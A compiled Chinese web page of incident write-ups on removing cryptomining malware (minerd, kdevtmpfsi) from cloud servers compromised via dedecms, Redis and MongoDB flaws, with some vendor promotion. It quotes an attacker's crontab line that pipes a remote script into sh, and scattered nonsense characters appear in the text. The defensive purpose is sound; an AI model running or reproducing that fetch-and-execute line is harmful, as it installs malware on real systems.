阿里云ECS 服务器被植入挖矿木马的处理解决过程分享

阿里云ECS服务器是目前很多网站客户在使用的，可以使用不同系统在服务器中，windows2008 windows2012,linux系统都可以在阿里云服务器中使用，前段时间我们SINE安全收到客户的安全求助，说是收到阿里云的短信提醒，提醒服务器存在挖矿进程，请立即处理的安全告警。客户网站都无法正常的打开，卡的连服务器SSH远程连接都进不去，给客户造成了很大的影响。

随即我们SINE安全工程师对客户的服务器进行全面的安全检测，登录阿里云的控制平台，通过本地远程进去，发现客户服务器CPU达到百分之100，查看了服务器的CPU监控记录，平常都是在百分之20-35之间浮动，我们TOP查看进程，追踪查看那些进程在占用CPU，通过检查发现，有个进程一直在占用，从上面检查出来的问题，可以判断客户的服务器被植入了挖矿程序，服务器被黑，导致阿里云安全警告有挖矿进程。

原来是客户的服务器中了挖矿木马，我们来看下top进程的截图：

我们对占用进程的ID，进行查找，发现该文件是在linux系统的tmp目录下，我们对该文件进行了强制删除，并使用强制删除进程的命令对该进程进行了删除，CPU瞬间降到百分之10，挖矿的根源就在这里，那么黑客是如何攻击服务器，植入挖矿木马程序的呢?通过我们SINE安全多年的安全经验判断，客户的网站可能被篡改了，我们立即展开对客户网站的全面安全检测，客户使用的是dedecms建站系统，开源的php+mysql数据库架构，对所有的代码以及图片，数据库进行了安全检测，果不其然发现了问题，网站的根目录下被上传了webshell木马文件，咨询了客户，客户说之前还收到过阿里云的webshell后门提醒，当时客户并没在意。

这次服务器被植入挖矿木马程序的漏洞根源就是网站存在漏洞，我们对dedecms的代码漏洞进行了人工修复，包括代码之前存在的远程代码执行漏洞，以及sql注入漏洞都进行了全面的漏洞修复，对网站的文件夹权限进行了安全部署，默认的dede后台帮客户做了修改，以及增加网站后台的二级密码防护。

清除木马后门，对服务器的定时任务里，发现了攻击者添加的任务计划，每次服务器重启以及间隔1小时，自动执行挖矿木马，对该定时任务计划进行删除，检查了linux系统用户，是否被添加其他的root级别的管理员用户，发现没有添加。对服务器的反向链接进行查看，包括恶意的端口有无其他IP链接，netstat -an检查了所有端口的安全状况，发现没有植入远程木马后门，对客户的端口安全进行了安全部署，使用iptables来限制端口的流入与流出。

至此客户服务器中挖矿木马的问题才得以彻底的解决，关于挖矿木马的防护与解决办法，总结一下

几点：

定期的对网站程序代码进行安全检测，检查是否有webshell后门，对网站的系统版本定期的升级与漏洞修复，网站的后台登录进行二次密码验证，防止网站存在sql注入漏洞，被获取管理员账号密码，从而登录后台。使用阿里云的端口安全策略，对80端口，以及443端口进行开放，其余的SSH端口进行IP放行，需要登录服务器的时候进阿里云后台添加放行的IP，尽可能的杜绝服务器被恶意登录，如果您也遇到服务器被阿里云提示挖矿程序，可以找专业的服务器安全公司来处理，国内也就SINESAFE,绿盟，启明星辰，等安全公司比较不错，也希望我们解决问题的过程，能够帮到更多的人。

阿里云服务器被挖矿了怎么办？(纯纯电脑小白

1. 关闭访问挖矿服务器的访问 iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.2. chmod -x minerd ,取消掉执行权限， 在没有找到根源前，千万不要删除 minerd，茄伍返因为删除了，过一回会自动有生成一个。3. pkill minerd ,杀掉进程4. service stop crond 或者 crontab -r 删除所有的执行计划5. 执行top，查看了一会，没有再发现minerd 进程了。6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。下载脚本的语句：*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh 病毒文件内容如下，感兴趣的可以研究下： View Code解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个漏洞获得了服务器的访问权限，http://blog.jobbole.com/94518/然后就注入了病毒，下面是解决办法和清除工作：1. 修复 redis 的后门,配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度好消息是Redis作者表示将会开发”real user”，区分普通用户和admin权限，普通用户将会被禁止运行橘物某些命令，如conf2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号3. 查看你的用户列表，是不是有你不认识的用户颤饥添加进来。 如果有就删除掉.

服务器被攻击并植入kdevtmpfsi挖矿/病毒/木马

MongoDB库中的数据莫名其妙没有了，发觉如下信息： 1、 top -d 5命令 ，查看系统负载情况、是否有未知进程，发现一个名为kdevtmpfsi的进程，经科普它是一个挖矿程序，会占用服务器高额的CPU、内存资源。如图，CPU占用率高达788.7%，而且是yarn用户下： 2、 ps -ef |grep kdevtmpfsi 命令查看 该挖矿程序路径：/tmp/kdevtmpfsi 3、 ps -ef |grep yarn 命令查看更多关于yarn相关进程信息（此时我的服务器并没有开启yarn服务，如果有yarn的相关进程则可判断是攻击者开启的进程），发现另外还有个kinsing进程，经科普kinsing进程是kdevtmpfsi的守护进程： 4、 netstat -lntupaa 命令查看是否有异常的ip,果然发现194.87.102.77这个陌生的ip，判断是kdevtmpfsi的发出者： 5、经查询该ip的所在国家是俄罗斯： 6、 find / -iname kdevtmpfsi 命令再次确定命令所在宴哪咐位置以便删除： 7、 cd /tmp 进入相关目录： 8、 rm -rf kdevtmpfsi 删除kdevtmpfsi程序： 9、** kill -9 40422**杀掉kdevtmpfsi进程： 10、发现并没杀掉所有kdevtmpfsi进程，再次查找yarn的相关进程（因为之前已确认病毒是在yarn下），果真还有kdevtmpfsi进程存在： 11、用命令 批量杀掉 相关进程： 12、删除kinsing文件： 13、现在，已经把挖矿程序及相关进程删除掉了，但是还有两处没做处理： 14、 crontab -l 命令先看看crontab的定时任务列表吧： 15、编写删除挖矿程序脚本 kill_kdevtmpfsi.sh ： 16、新增 定时任务 并删除攻击者的挖矿定时任务： 17、 crontab -l命令 查看现在只有杀进程的定时任务了： 18、禁止黑客的IP地址。 最初安装MongoDB时，并未设置密码认证，存在漏洞，导致黑客通过漏洞攻击服务器，并在程序里植入木马/病毒。单纯缓码的kill -9 id杀掉病毒进程是杀不彻底晌纯的，治标不治本，应该定时删除病毒进程，禁止攻击者IP，重新安装系统或相关软件。 经过几天的观察，服务器运行正常，再没有被黑客攻击成功。

阿里云windows服务器中了挖矿的病毒怎么清理？

光删除没用的，因为没有困滚解决好漏洞。建议是重做系统，然后找护卫神给你做一下系统安全加判脊固，把汪冲余漏洞彻底堵住才有效果。